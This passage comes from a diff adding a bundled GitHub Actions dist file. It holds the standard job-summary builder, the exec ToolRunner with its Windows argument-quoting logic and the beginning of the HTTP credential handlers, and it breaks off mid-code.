value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.summary = exports.markdownSummary = exports.SUMMARY_DOCS_URL = exports.SUMMARY_ENV_VAR = void 0; +const os_1 = __nccwpck_require__(2037); +const fs_1 = __nccwpck_require__(7147); +const { access, appendFile, writeFile } = fs_1.promises; +exports.SUMMARY_ENV_VAR = 'GITHUB_STEP_SUMMARY'; +exports.SUMMARY_DOCS_URL = 'https://docs.github.com/actions/using-workflows/workflow-commands-for-github-actions#adding-a-job-summary'; +class Summary { + constructor() { + this._buffer = ''; + } + /** + * Finds the summary file path from the environment, rejects if env var is not found or file does not exist + * Also checks r/w permissions. + * + * @returns step summary file path + */ + filePath() { + return __awaiter(this, void 0, void 0, function* () { + if (this._filePath) { + return this._filePath; + } + const pathFromEnv = process.env[exports.SUMMARY_ENV_VAR]; + if (!pathFromEnv) { + throw new Error(`Unable to find environment variable for $${exports.SUMMARY_ENV_VAR}. Check if your runtime environment supports job summaries.`); + } + try { + yield access(pathFromEnv, fs_1.constants.R_OK | fs_1.constants.W_OK); + } + catch (_a) { + throw new Error(`Unable to access summary file: '${pathFromEnv}'. 
Check if the file has correct read/write permissions.`); + } + this._filePath = pathFromEnv; + return this._filePath; + }); + } + /** + * Wraps content in an HTML tag, adding any HTML attributes + * + * @param {string} tag HTML tag to wrap + * @param {string | null} content content within the tag + * @param {[attribute: string]: string} attrs key-value list of HTML attributes to add + * + * @returns {string} content wrapped in HTML element + */ + wrap(tag, content, attrs = {}) { + const htmlAttrs = Object.entries(attrs) + .map(([key, value]) => ` ${key}="${value}"`) + .join(''); + if (!content) { + return `<${tag}${htmlAttrs}>`; + } + return `<${tag}${htmlAttrs}>${content}`; + } + /** + * Writes text in the buffer to the summary buffer file and empties buffer. Will append by default. + * + * @param {SummaryWriteOptions} [options] (optional) options for write operation + * + * @returns {Promise} summary instance + */ + write(options) { + return __awaiter(this, void 0, void 0, function* () { + const overwrite = !!(options === null || options === void 0 ? void 0 : options.overwrite); + const filePath = yield this.filePath(); + const writeFunc = overwrite ? 
writeFile : appendFile; + yield writeFunc(filePath, this._buffer, { encoding: 'utf8' }); + return this.emptyBuffer(); + }); + } + /** + * Clears the summary buffer and wipes the summary file + * + * @returns {Summary} summary instance + */ + clear() { + return __awaiter(this, void 0, void 0, function* () { + return this.emptyBuffer().write({ overwrite: true }); + }); + } + /** + * Returns the current summary buffer as a string + * + * @returns {string} string of summary buffer + */ + stringify() { + return this._buffer; + } + /** + * If the summary buffer is empty + * + * @returns {boolen} true if the buffer is empty + */ + isEmptyBuffer() { + return this._buffer.length === 0; + } + /** + * Resets the summary buffer without writing to summary file + * + * @returns {Summary} summary instance + */ + emptyBuffer() { + this._buffer = ''; + return this; + } + /** + * Adds raw text to the summary buffer + * + * @param {string} text content to add + * @param {boolean} [addEOL=false] (optional) append an EOL to the raw text (default: false) + * + * @returns {Summary} summary instance + */ + addRaw(text, addEOL = false) { + this._buffer += text; + return addEOL ? 
this.addEOL() : this; + } + /** + * Adds the operating system-specific end-of-line marker to the buffer + * + * @returns {Summary} summary instance + */ + addEOL() { + return this.addRaw(os_1.EOL); + } + /** + * Adds an HTML codeblock to the summary buffer + * + * @param {string} code content to render within fenced code block + * @param {string} lang (optional) language to syntax highlight code + * + * @returns {Summary} summary instance + */ + addCodeBlock(code, lang) { + const attrs = Object.assign({}, (lang && { lang })); + const element = this.wrap('pre', this.wrap('code', code), attrs); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML list to the summary buffer + * + * @param {string[]} items list of items to render + * @param {boolean} [ordered=false] (optional) if the rendered list should be ordered or not (default: false) + * + * @returns {Summary} summary instance + */ + addList(items, ordered = false) { + const tag = ordered ? 'ol' : 'ul'; + const listItems = items.map(item => this.wrap('li', item)).join(''); + const element = this.wrap(tag, listItems); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML table to the summary buffer + * + * @param {SummaryTableCell[]} rows table rows + * + * @returns {Summary} summary instance + */ + addTable(rows) { + const tableBody = rows + .map(row => { + const cells = row + .map(cell => { + if (typeof cell === 'string') { + return this.wrap('td', cell); + } + const { header, data, colspan, rowspan } = cell; + const tag = header ? 
'th' : 'td'; + const attrs = Object.assign(Object.assign({}, (colspan && { colspan })), (rowspan && { rowspan })); + return this.wrap(tag, data, attrs); + }) + .join(''); + return this.wrap('tr', cells); + }) + .join(''); + const element = this.wrap('table', tableBody); + return this.addRaw(element).addEOL(); + } + /** + * Adds a collapsable HTML details element to the summary buffer + * + * @param {string} label text for the closed state + * @param {string} content collapsable content + * + * @returns {Summary} summary instance + */ + addDetails(label, content) { + const element = this.wrap('details', this.wrap('summary', label) + content); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML image tag to the summary buffer + * + * @param {string} src path to the image you to embed + * @param {string} alt text description of the image + * @param {SummaryImageOptions} options (optional) addition image attributes + * + * @returns {Summary} summary instance + */ + addImage(src, alt, options) { + const { width, height } = options || {}; + const attrs = Object.assign(Object.assign({}, (width && { width })), (height && { height })); + const element = this.wrap('img', null, Object.assign({ src, alt }, attrs)); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML section heading element + * + * @param {string} text heading text + * @param {number | string} [level=1] (optional) the heading level, default: 1 + * + * @returns {Summary} summary instance + */ + addHeading(text, level) { + const tag = `h${level}`; + const allowedTag = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6'].includes(tag) + ? tag + : 'h1'; + const element = this.wrap(allowedTag, text); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML thematic break (
) to the summary buffer + * + * @returns {Summary} summary instance + */ + addSeparator() { + const element = this.wrap('hr', null); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML line break (
) to the summary buffer + * + * @returns {Summary} summary instance + */ + addBreak() { + const element = this.wrap('br', null); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML blockquote to the summary buffer + * + * @param {string} text quote text + * @param {string} cite (optional) citation url + * + * @returns {Summary} summary instance + */ + addQuote(text, cite) { + const attrs = Object.assign({}, (cite && { cite })); + const element = this.wrap('blockquote', text, attrs); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML anchor tag to the summary buffer + * + * @param {string} text link text/content + * @param {string} href hyperlink + * + * @returns {Summary} summary instance + */ + addLink(text, href) { + const element = this.wrap('a', text, { href }); + return this.addRaw(element).addEOL(); + } +} +const _summary = new Summary(); +/** + * @deprecated use `core.summary` + */ +exports.markdownSummary = _summary; +exports.summary = _summary; +//# sourceMappingURL=summary.js.map + +/***/ }), + +/***/ 5278: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + +// We use any as a valid input type +/* eslint-disable @typescript-eslint/no-explicit-any */ +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.toCommandProperties = exports.toCommandValue = void 0; +/** + * Sanitizes an input into a string so it can be passed into issueCommand safely + * @param input input to sanitize into a string + */ +function toCommandValue(input) { + if (input === null || input === undefined) { + return ''; + } + else if (typeof input === 'string' || input instanceof String) { + return input; + } + return JSON.stringify(input); +} +exports.toCommandValue = toCommandValue; +/** + * + * @param annotationProperties + * @returns The command properties to send with the actual annotation command + * See IssueCommandProperties: 
https://github.com/actions/runner/blob/main/src/Runner.Worker/ActionCommandManager.cs#L646 + */ +function toCommandProperties(annotationProperties) { + if (!Object.keys(annotationProperties).length) { + return {}; + } + return { + title: annotationProperties.title, + file: annotationProperties.file, + line: annotationProperties.startLine, + endLine: annotationProperties.endLine, + col: annotationProperties.startColumn, + endColumn: annotationProperties.endColumn + }; +} +exports.toCommandProperties = toCommandProperties; +//# sourceMappingURL=utils.js.map + +/***/ }), + +/***/ 1514: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.getExecOutput = exports.exec = void 0; +const string_decoder_1 = __nccwpck_require__(1576); +const tr = __importStar(__nccwpck_require__(8159)); +/** + * Exec a command. + * Output will be streamed to the live console. + * Returns promise with return code + * + * @param commandLine command to execute (can include additional args). Must be correctly escaped. + * @param args optional arguments for tool. Escaping is handled by the lib. + * @param options optional exec options. See ExecOptions + * @returns Promise exit code + */ +function exec(commandLine, args, options) { + return __awaiter(this, void 0, void 0, function* () { + const commandArgs = tr.argStringToArray(commandLine); + if (commandArgs.length === 0) { + throw new Error(`Parameter 'commandLine' cannot be null or empty.`); + } + // Path to tool to execute should be first arg + const toolPath = commandArgs[0]; + args = commandArgs.slice(1).concat(args || []); + const runner = new tr.ToolRunner(toolPath, args, options); + return runner.exec(); + }); +} +exports.exec = exec; +/** + * Exec a command and get the output. + * Output will be streamed to the live console. + * Returns promise with the exit code and collected stdout and stderr + * + * @param commandLine command to execute (can include additional args). Must be correctly escaped. + * @param args optional arguments for tool. Escaping is handled by the lib. 
+ * @param options optional exec options. See ExecOptions + * @returns Promise exit code, stdout, and stderr + */ +function getExecOutput(commandLine, args, options) { + var _a, _b; + return __awaiter(this, void 0, void 0, function* () { + let stdout = ''; + let stderr = ''; + //Using string decoder covers the case where a mult-byte character is split + const stdoutDecoder = new string_decoder_1.StringDecoder('utf8'); + const stderrDecoder = new string_decoder_1.StringDecoder('utf8'); + const originalStdoutListener = (_a = options === null || options === void 0 ? void 0 : options.listeners) === null || _a === void 0 ? void 0 : _a.stdout; + const originalStdErrListener = (_b = options === null || options === void 0 ? void 0 : options.listeners) === null || _b === void 0 ? void 0 : _b.stderr; + const stdErrListener = (data) => { + stderr += stderrDecoder.write(data); + if (originalStdErrListener) { + originalStdErrListener(data); + } + }; + const stdOutListener = (data) => { + stdout += stdoutDecoder.write(data); + if (originalStdoutListener) { + originalStdoutListener(data); + } + }; + const listeners = Object.assign(Object.assign({}, options === null || options === void 0 ? void 0 : options.listeners), { stdout: stdOutListener, stderr: stdErrListener }); + const exitCode = yield exec(commandLine, args, Object.assign(Object.assign({}, options), { listeners })); + //flush any remaining characters + stdout += stdoutDecoder.end(); + stderr += stderrDecoder.end(); + return { + exitCode, + stdout, + stderr + }; + }); +} +exports.getExecOutput = getExecOutput; +//# sourceMappingURL=exec.js.map + +/***/ }), + +/***/ 8159: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? 
(function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.argStringToArray = exports.ToolRunner = void 0; +const os = __importStar(__nccwpck_require__(2037)); +const events = __importStar(__nccwpck_require__(2361)); +const child = __importStar(__nccwpck_require__(2081)); +const path = __importStar(__nccwpck_require__(1017)); +const io = __importStar(__nccwpck_require__(7436)); +const ioUtil = __importStar(__nccwpck_require__(1962)); +const timers_1 = __nccwpck_require__(9512); +/* eslint-disable @typescript-eslint/unbound-method */ +const IS_WINDOWS = process.platform === 'win32'; +/* + * Class for running command line tools. Handles quoting and arg parsing in a platform agnostic way. + */ +class ToolRunner extends events.EventEmitter { + constructor(toolPath, args, options) { + super(); + if (!toolPath) { + throw new Error("Parameter 'toolPath' cannot be null or empty."); + } + this.toolPath = toolPath; + this.args = args || []; + this.options = options || {}; + } + _debug(message) { + if (this.options.listeners && this.options.listeners.debug) { + this.options.listeners.debug(message); + } + } + _getCommandString(options, noPrefix) { + const toolPath = this._getSpawnFileName(); + const args = this._getSpawnArgs(options); + let cmd = noPrefix ? 
'' : '[command]'; // omit prefix when piped to a second tool + if (IS_WINDOWS) { + // Windows + cmd file + if (this._isCmdFile()) { + cmd += toolPath; + for (const a of args) { + cmd += ` ${a}`; + } + } + // Windows + verbatim + else if (options.windowsVerbatimArguments) { + cmd += `"${toolPath}"`; + for (const a of args) { + cmd += ` ${a}`; + } + } + // Windows (regular) + else { + cmd += this._windowsQuoteCmdArg(toolPath); + for (const a of args) { + cmd += ` ${this._windowsQuoteCmdArg(a)}`; + } + } + } + else { + // OSX/Linux - this can likely be improved with some form of quoting. + // creating processes on Unix is fundamentally different than Windows. + // on Unix, execvp() takes an arg array. + cmd += toolPath; + for (const a of args) { + cmd += ` ${a}`; + } + } + return cmd; + } + _processLineBuffer(data, strBuffer, onLine) { + try { + let s = strBuffer + data.toString(); + let n = s.indexOf(os.EOL); + while (n > -1) { + const line = s.substring(0, n); + onLine(line); + // the rest of the string ... + s = s.substring(n + os.EOL.length); + n = s.indexOf(os.EOL); + } + return s; + } + catch (err) { + // streaming lines to console is best effort. Don't fail a build. + this._debug(`error processing line. Failed with error ${err}`); + return ''; + } + } + _getSpawnFileName() { + if (IS_WINDOWS) { + if (this._isCmdFile()) { + return process.env['COMSPEC'] || 'cmd.exe'; + } + } + return this.toolPath; + } + _getSpawnArgs(options) { + if (IS_WINDOWS) { + if (this._isCmdFile()) { + let argline = `/D /S /C "${this._windowsQuoteCmdArg(this.toolPath)}`; + for (const a of this.args) { + argline += ' '; + argline += options.windowsVerbatimArguments + ? 
a + : this._windowsQuoteCmdArg(a); + } + argline += '"'; + return [argline]; + } + } + return this.args; + } + _endsWith(str, end) { + return str.endsWith(end); + } + _isCmdFile() { + const upperToolPath = this.toolPath.toUpperCase(); + return (this._endsWith(upperToolPath, '.CMD') || + this._endsWith(upperToolPath, '.BAT')); + } + _windowsQuoteCmdArg(arg) { + // for .exe, apply the normal quoting rules that libuv applies + if (!this._isCmdFile()) { + return this._uvQuoteCmdArg(arg); + } + // otherwise apply quoting rules specific to the cmd.exe command line parser. + // the libuv rules are generic and are not designed specifically for cmd.exe + // command line parser. + // + // for a detailed description of the cmd.exe command line parser, refer to + // http://stackoverflow.com/questions/4094699/how-does-the-windows-command-interpreter-cmd-exe-parse-scripts/7970912#7970912 + // need quotes for empty arg + if (!arg) { + return '""'; + } + // determine whether the arg needs to be quoted + const cmdSpecialChars = [ + ' ', + '\t', + '&', + '(', + ')', + '[', + ']', + '{', + '}', + '^', + '=', + ';', + '!', + "'", + '+', + ',', + '`', + '~', + '|', + '<', + '>', + '"' + ]; + let needsQuotes = false; + for (const char of arg) { + if (cmdSpecialChars.some(x => x === char)) { + needsQuotes = true; + break; + } + } + // short-circuit if quotes not needed + if (!needsQuotes) { + return arg; + } + // the following quoting rules are very similar to the rules that by libuv applies. + // + // 1) wrap the string in quotes + // + // 2) double-up quotes - i.e. " => "" + // + // this is different from the libuv quoting rules. libuv replaces " with \", which unfortunately + // doesn't work well with a cmd.exe command line. + // + // note, replacing " with "" also works well if the arg is passed to a downstream .NET console app. 
+ // for example, the command line: + // foo.exe "myarg:""my val""" + // is parsed by a .NET console app into an arg array: + // [ "myarg:\"my val\"" ] + // which is the same end result when applying libuv quoting rules. although the actual + // command line from libuv quoting rules would look like: + // foo.exe "myarg:\"my val\"" + // + // 3) double-up slashes that precede a quote, + // e.g. hello \world => "hello \world" + // hello\"world => "hello\\""world" + // hello\\"world => "hello\\\\""world" + // hello world\ => "hello world\\" + // + // technically this is not required for a cmd.exe command line, or the batch argument parser. + // the reasons for including this as a .cmd quoting rule are: + // + // a) this is optimized for the scenario where the argument is passed from the .cmd file to an + // external program. many programs (e.g. .NET console apps) rely on the slash-doubling rule. + // + // b) it's what we've been doing previously (by deferring to node default behavior) and we + // haven't heard any complaints about that aspect. + // + // note, a weakness of the quoting rules chosen here, is that % is not escaped. in fact, % cannot be + // escaped when used on the command line directly - even though within a .cmd file % can be escaped + // by using %%. + // + // the saving grace is, on the command line, %var% is left as-is if var is not defined. this contrasts + // the line parsing rules within a .cmd file, where if var is not defined it is replaced with nothing. + // + // one option that was explored was replacing % with ^% - i.e. %var% => ^%var^%. this hack would + // often work, since it is unlikely that var^ would exist, and the ^ character is removed when the + // variable is used. the problem, however, is that ^ is not removed when %* is used to pass the args + // to an external program. + // + // an unexplored potential solution for the % escaping problem, is to create a wrapper .cmd file. + // % can be escaped within a .cmd file. 
+ let reverse = '"'; + let quoteHit = true; + for (let i = arg.length; i > 0; i--) { + // walk the string in reverse + reverse += arg[i - 1]; + if (quoteHit && arg[i - 1] === '\\') { + reverse += '\\'; // double the slash + } + else if (arg[i - 1] === '"') { + quoteHit = true; + reverse += '"'; // double the quote + } + else { + quoteHit = false; + } + } + reverse += '"'; + return reverse + .split('') + .reverse() + .join(''); + } + _uvQuoteCmdArg(arg) { + // Tool runner wraps child_process.spawn() and needs to apply the same quoting as + // Node in certain cases where the undocumented spawn option windowsVerbatimArguments + // is used. + // + // Since this function is a port of quote_cmd_arg from Node 4.x (technically, lib UV, + // see https://github.com/nodejs/node/blob/v4.x/deps/uv/src/win/process.c for details), + // pasting copyright notice from Node within this function: + // + // Copyright Joyent, Inc. and other Node contributors. All rights reserved. + // + // Permission is hereby granted, free of charge, to any person obtaining a copy + // of this software and associated documentation files (the "Software"), to + // deal in the Software without restriction, including without limitation the + // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + // sell copies of the Software, and to permit persons to whom the Software is + // furnished to do so, subject to the following conditions: + // + // The above copyright notice and this permission notice shall be included in + // all copies or substantial portions of the Software. + // + // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE + // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + // IN THE SOFTWARE. + if (!arg) { + // Need double quotation for empty argument + return '""'; + } + if (!arg.includes(' ') && !arg.includes('\t') && !arg.includes('"')) { + // No quotation needed + return arg; + } + if (!arg.includes('"') && !arg.includes('\\')) { + // No embedded double quotes or backslashes, so I can just wrap + // quote marks around the whole thing. + return `"${arg}"`; + } + // Expected input/output: + // input : hello"world + // output: "hello\"world" + // input : hello""world + // output: "hello\"\"world" + // input : hello\world + // output: hello\world + // input : hello\\world + // output: hello\\world + // input : hello\"world + // output: "hello\\\"world" + // input : hello\\"world + // output: "hello\\\\\"world" + // input : hello world\ + // output: "hello world\\" - note the comment in libuv actually reads "hello world\" + // but it appears the comment is wrong, it should be "hello world\\" + let reverse = '"'; + let quoteHit = true; + for (let i = arg.length; i > 0; i--) { + // walk the string in reverse + reverse += arg[i - 1]; + if (quoteHit && arg[i - 1] === '\\') { + reverse += '\\'; + } + else if (arg[i - 1] === '"') { + quoteHit = true; + reverse += '\\'; + } + else { + quoteHit = false; + } + } + reverse += '"'; + return reverse + .split('') + .reverse() + .join(''); + } + _cloneExecOptions(options) { + options = options || {}; + const result = { + cwd: options.cwd || process.cwd(), + env: options.env || process.env, + silent: options.silent || false, + windowsVerbatimArguments: options.windowsVerbatimArguments || false, + failOnStdErr: options.failOnStdErr || false, + ignoreReturnCode: options.ignoreReturnCode || false, + delay: options.delay || 10000 + }; + 
result.outStream = options.outStream || process.stdout; + result.errStream = options.errStream || process.stderr; + return result; + } + _getSpawnOptions(options, toolPath) { + options = options || {}; + const result = {}; + result.cwd = options.cwd; + result.env = options.env; + result['windowsVerbatimArguments'] = + options.windowsVerbatimArguments || this._isCmdFile(); + if (options.windowsVerbatimArguments) { + result.argv0 = `"${toolPath}"`; + } + return result; + } + /** + * Exec a tool. + * Output will be streamed to the live console. + * Returns promise with return code + * + * @param tool path to tool to exec + * @param options optional exec options. See ExecOptions + * @returns number + */ + exec() { + return __awaiter(this, void 0, void 0, function* () { + // root the tool path if it is unrooted and contains relative pathing + if (!ioUtil.isRooted(this.toolPath) && + (this.toolPath.includes('/') || + (IS_WINDOWS && this.toolPath.includes('\\')))) { + // prefer options.cwd if it is specified, however options.cwd may also need to be rooted + this.toolPath = path.resolve(process.cwd(), this.options.cwd || process.cwd(), this.toolPath); + } + // if the tool is only a file name, then resolve it from the PATH + // otherwise verify it exists (add extension on Windows if necessary) + this.toolPath = yield io.which(this.toolPath, true); + return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { + this._debug(`exec tool: ${this.toolPath}`); + this._debug('arguments:'); + for (const arg of this.args) { + this._debug(` ${arg}`); + } + const optionsNonNull = this._cloneExecOptions(this.options); + if (!optionsNonNull.silent && optionsNonNull.outStream) { + optionsNonNull.outStream.write(this._getCommandString(optionsNonNull) + os.EOL); + } + const state = new ExecState(optionsNonNull, this.toolPath); + state.on('debug', (message) => { + this._debug(message); + }); + if (this.options.cwd && !(yield ioUtil.exists(this.options.cwd))) { + 
return reject(new Error(`The cwd: ${this.options.cwd} does not exist!`)); + } + const fileName = this._getSpawnFileName(); + const cp = child.spawn(fileName, this._getSpawnArgs(optionsNonNull), this._getSpawnOptions(this.options, fileName)); + let stdbuffer = ''; + if (cp.stdout) { + cp.stdout.on('data', (data) => { + if (this.options.listeners && this.options.listeners.stdout) { + this.options.listeners.stdout(data); + } + if (!optionsNonNull.silent && optionsNonNull.outStream) { + optionsNonNull.outStream.write(data); + } + stdbuffer = this._processLineBuffer(data, stdbuffer, (line) => { + if (this.options.listeners && this.options.listeners.stdline) { + this.options.listeners.stdline(line); + } + }); + }); + } + let errbuffer = ''; + if (cp.stderr) { + cp.stderr.on('data', (data) => { + state.processStderr = true; + if (this.options.listeners && this.options.listeners.stderr) { + this.options.listeners.stderr(data); + } + if (!optionsNonNull.silent && + optionsNonNull.errStream && + optionsNonNull.outStream) { + const s = optionsNonNull.failOnStdErr + ? 
optionsNonNull.errStream + : optionsNonNull.outStream; + s.write(data); + } + errbuffer = this._processLineBuffer(data, errbuffer, (line) => { + if (this.options.listeners && this.options.listeners.errline) { + this.options.listeners.errline(line); + } + }); + }); + } + cp.on('error', (err) => { + state.processError = err.message; + state.processExited = true; + state.processClosed = true; + state.CheckComplete(); + }); + cp.on('exit', (code) => { + state.processExitCode = code; + state.processExited = true; + this._debug(`Exit code ${code} received from tool '${this.toolPath}'`); + state.CheckComplete(); + }); + cp.on('close', (code) => { + state.processExitCode = code; + state.processExited = true; + state.processClosed = true; + this._debug(`STDIO streams have closed for tool '${this.toolPath}'`); + state.CheckComplete(); + }); + state.on('done', (error, exitCode) => { + if (stdbuffer.length > 0) { + this.emit('stdline', stdbuffer); + } + if (errbuffer.length > 0) { + this.emit('errline', errbuffer); + } + cp.removeAllListeners(); + if (error) { + reject(error); + } + else { + resolve(exitCode); + } + }); + if (this.options.input) { + if (!cp.stdin) { + throw new Error('child process missing stdin'); + } + cp.stdin.end(this.options.input); + } + })); + }); + } +} +exports.ToolRunner = ToolRunner; +/** + * Convert an arg string to an array of args. Handles escaping + * + * @param argString string of arguments + * @returns string[] array of arguments + */ +function argStringToArray(argString) { + const args = []; + let inQuotes = false; + let escaped = false; + let arg = ''; + function append(c) { + // we only escape double quotes. 
+ if (escaped && c !== '"') { + arg += '\\'; + } + arg += c; + escaped = false; + } + for (let i = 0; i < argString.length; i++) { + const c = argString.charAt(i); + if (c === '"') { + if (!escaped) { + inQuotes = !inQuotes; + } + else { + append(c); + } + continue; + } + if (c === '\\' && escaped) { + append(c); + continue; + } + if (c === '\\' && inQuotes) { + escaped = true; + continue; + } + if (c === ' ' && !inQuotes) { + if (arg.length > 0) { + args.push(arg); + arg = ''; + } + continue; + } + append(c); + } + if (arg.length > 0) { + args.push(arg.trim()); + } + return args; +} +exports.argStringToArray = argStringToArray; +class ExecState extends events.EventEmitter { + constructor(options, toolPath) { + super(); + this.processClosed = false; // tracks whether the process has exited and stdio is closed + this.processError = ''; + this.processExitCode = 0; + this.processExited = false; // tracks whether the process has exited + this.processStderr = false; // tracks whether stderr was written to + this.delay = 10000; // 10 seconds + this.done = false; + this.timeout = null; + if (!toolPath) { + throw new Error('toolPath must not be empty'); + } + this.options = options; + this.toolPath = toolPath; + if (options.delay) { + this.delay = options.delay; + } + } + CheckComplete() { + if (this.done) { + return; + } + if (this.processClosed) { + this._setResult(); + } + else if (this.processExited) { + this.timeout = timers_1.setTimeout(ExecState.HandleTimeout, this.delay, this); + } + } + _debug(message) { + this.emit('debug', message); + } + _setResult() { + // determine whether there is an error + let error; + if (this.processExited) { + if (this.processError) { + error = new Error(`There was an error when attempting to execute the process '${this.toolPath}'. This may indicate the process failed to start. 
Error: ${this.processError}`); + } + else if (this.processExitCode !== 0 && !this.options.ignoreReturnCode) { + error = new Error(`The process '${this.toolPath}' failed with exit code ${this.processExitCode}`); + } + else if (this.processStderr && this.options.failOnStdErr) { + error = new Error(`The process '${this.toolPath}' failed because one or more lines were written to the STDERR stream`); + } + } + // clear the timeout + if (this.timeout) { + clearTimeout(this.timeout); + this.timeout = null; + } + this.done = true; + this.emit('done', error, this.processExitCode); + } + static HandleTimeout(state) { + if (state.done) { + return; + } + if (!state.processClosed && state.processExited) { + const message = `The STDIO streams did not close within ${state.delay / + 1000} seconds of the exit event from process '${state.toolPath}'. This may indicate a child process inherited the STDIO streams and has not yet exited.`; + state._debug(message); + } + state._setResult(); + } +} +//# sourceMappingURL=toolrunner.js.map + +/***/ }), + +/***/ 5526: +/***/ (function(__unused_webpack_module, exports) { + +"use strict"; + +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.PersonalAccessTokenCredentialHandler = exports.BearerCredentialHandler = exports.BasicCredentialHandler = void 0; +class BasicCredentialHandler { + constructor(username, password) { + this.username = username; + this.password = password; + } + prepareRequest(options) { + if (!options.headers) { + throw Error('The request has no headers'); + } + options.headers['Authorization'] = `Basic ${Buffer.from(`${this.username}:${this.password}`).toString('base64')}`; + } + // This handler cannot handle 401 + canHandleAuthentication() { + return false; + } + handleAuthentication() { + return __awaiter(this, void 0, void 0, function* () { + throw new Error('not implemented'); + }); + } +} +exports.BasicCredentialHandler = BasicCredentialHandler; +class BearerCredentialHandler { + constructor(token) { + this.token = token; + } + // currently implements pre-authorization + // TODO: support preAuth = false where it hooks on 401 + prepareRequest(options) { + if (!options.headers) { + throw Error('The request has no headers'); + } + options.headers['Authorization'] = `Bearer ${this.token}`; + } + // This handler cannot handle 401 + canHandleAuthentication() { + return false; + } + handleAuthentication() { + return __awaiter(this, void 0, void 0, function* () { + throw new Error('not implemented'); + }); + } +} +exports.BearerCredentialHandler = BearerCredentialHandler; +class PersonalAccessTokenCredentialHandler { + constructor(token) { + this.token = token; + } + // currently implements pre-authorization + // TODO: support preAuth = false where it hooks on 401 + prepareRequest(options) { + if (!options.headers) { + throw Error('The request has no headers'); + } + options.headers['Authorization'] = `Basic 
